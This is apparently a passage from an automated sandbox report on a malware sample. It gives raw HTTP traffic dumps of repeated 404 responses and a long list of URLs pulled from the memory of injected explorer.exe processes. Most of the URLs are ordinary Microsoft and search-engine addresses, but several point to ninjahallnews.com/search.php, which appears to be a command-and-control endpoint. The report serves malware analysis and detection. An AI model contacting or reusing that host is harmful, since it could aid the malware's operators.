HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 22:20:23 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 22:20:23 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 22:20:24 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 22:20:25 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 22:20:26 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 22:21:33 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 22:21:35 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 22:21:37 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 22:21:39 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 22:21:52 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 22:22:08 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 22:22:29 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 22:22:52 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 22:23:18 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: explorer.exe, 00000001.00000000.1779684746.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1777426774.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
      Source: explorer.exe, 00000001.00000000.1779684746.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1777426774.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
      Source: explorer.exe, 00000001.00000000.1779684746.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1777426774.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
      Source: explorer.exe, 00000001.00000000.1779684746.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1777426774.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
      Source: explorer.exe, 00000001.00000000.1777426774.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
      Source: explorer.exe, 00000001.00000000.1778417663.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1780694925.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1778954174.0000000008720000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
      Source: explorer.exe, 00000001.00000000.1783714743.000000000C964000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
      Source: explorer.exe, 0000000C.00000003.2706066309.0000000003441000.00000004.00000020.00020000.00000000.sdmp, DF4B.tmp.12.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
      Source: explorer.exe, 00000001.00000000.1783714743.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
      Source: explorer.exe, 00000001.00000000.1777426774.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
      Source: explorer.exe, 00000001.00000000.1777426774.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
      Source: explorer.exe, 00000001.00000000.1783714743.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
      Source: explorer.exe, 00000001.00000000.1779684746.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
      Source: explorer.exe, 00000001.00000000.1779684746.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
      Source: explorer.exe, 00000001.00000000.1775685561.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1776398835.0000000003700000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
      Source: explorer.exe, 00000001.00000000.1779684746.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
      Source: explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
      Source: explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1779684746.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
      Source: explorer.exe, 00000001.00000000.1779684746.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
      Source: explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
      Source: explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
      Source: explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
      Source: explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
      Source: explorer.exe, 0000000C.00000003.2706066309.0000000003441000.00000004.00000020.00020000.00000000.sdmp, DF4B.tmp.12.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
      Source: explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
      Source: explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
      Source: explorer.exe, 00000001.00000000.1777426774.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
      Source: explorer.exe, 00000001.00000000.1777426774.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
      Source: explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
      Source: explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
      Source: explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
      Source: explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
      Source: explorer.exe, 0000000C.00000003.2706066309.0000000003441000.00000004.00000020.00020000.00000000.sdmp, DF4B.tmp.12.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
      Source: explorer.exe, 0000000C.00000003.2706066309.0000000003441000.00000004.00000020.00020000.00000000.sdmp, DF4B.tmp.12.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
      Source: explorer.exe, 0000000C.00000003.2706066309.0000000003441000.00000004.00000020.00020000.00000000.sdmp, DF4B.tmp.12.drString found in binary or memory: https://duckduckgo.com/ac/?q=
      Source: explorer.exe, 0000000C.00000003.2706066309.0000000003441000.00000004.00000020.00020000.00000000.sdmp, DF4B.tmp.12.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
      Source: explorer.exe, 0000000C.00000003.2706066309.0000000003441000.00000004.00000020.00020000.00000000.sdmp, DF4B.tmp.12.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
      Source: explorer.exe, 00000001.00000000.1783714743.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
      Source: explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
      Source: explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
      Source: explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
      Source: explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
      Source: explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
      Source: explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
      Source: explorer.exe, 00000001.00000000.1777426774.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
      Source: explorer.exe, 0000000C.00000002.2734650053.00000000033D0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2734650053.0000000003446000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2734650053.000000000345A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ninjahallnews.com/
      Source: explorer.exe, 0000000C.00000002.2734650053.0000000003446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ninjahallnews.com/application/x-www-form-urlencodedMozilla/5.0
      Source: explorer.exe, 0000000C.00000002.2734650053.00000000033D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ninjahallnews.com/earch.php
      Source: explorer.exe, 0000000C.00000002.2734650053.00000000033D0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2734650053.0000000003446000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.2671360392.0000000000828000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.4175889505.0000000002E77000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.4175623064.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.4175797278.00000000032F7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.4174637350.0000000000F18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ninjahallnews.com/search.php
      Source: explorer.exe, 0000000C.00000002.2734650053.00000000033D0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.2671360392.0000000000828000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.4175889505.0000000002E77000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.4175623064.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.4175797278.00000000032F7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.4174637350.0000000000F18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ninjahallnews.com/search.phpMozilla/5.0
      Source: explorer.exe, 0000000C.00000002.2734650053.00000000033D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ninjahallnews.com:443/search.phpge
      Source: explorer.exe, 00000001.00000000.1783714743.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
      Source: explorer.exe, 00000001.00000000.1783714743.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
      Source: explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
      Source: explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
      Source: explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
      Source: explorer.exe, 00000001.00000000.1783714743.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
      Source: explorer.exe, 00000001.00000000.1783714743.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
      Source: explorer.exe, 0000000C.00000003.2706066309.0000000003441000.00000004.00000020.00020000.00000000.sdmp, DF4B.tmp.12.drString found in binary or memory: https://www.ecosia.org/newtab/
      Source: explorer.exe, 0000000C.00000003.2706066309.0000000003441000.00000004.00000020.00020000.00000000.sdmp, DF4B.tmp.12.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
      Source: explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
      Source: explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
      Source: explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1777426774.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
      Source: explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
      Source: explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
      Source: explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
      Source: explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
      Source: explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
      Source: explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
      Source: explorer.exe, 00000001.00000000.1777426774.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
      Source: explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
      Source: explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
      Source: explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
      Source: explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
      Source: explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
      Source: explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
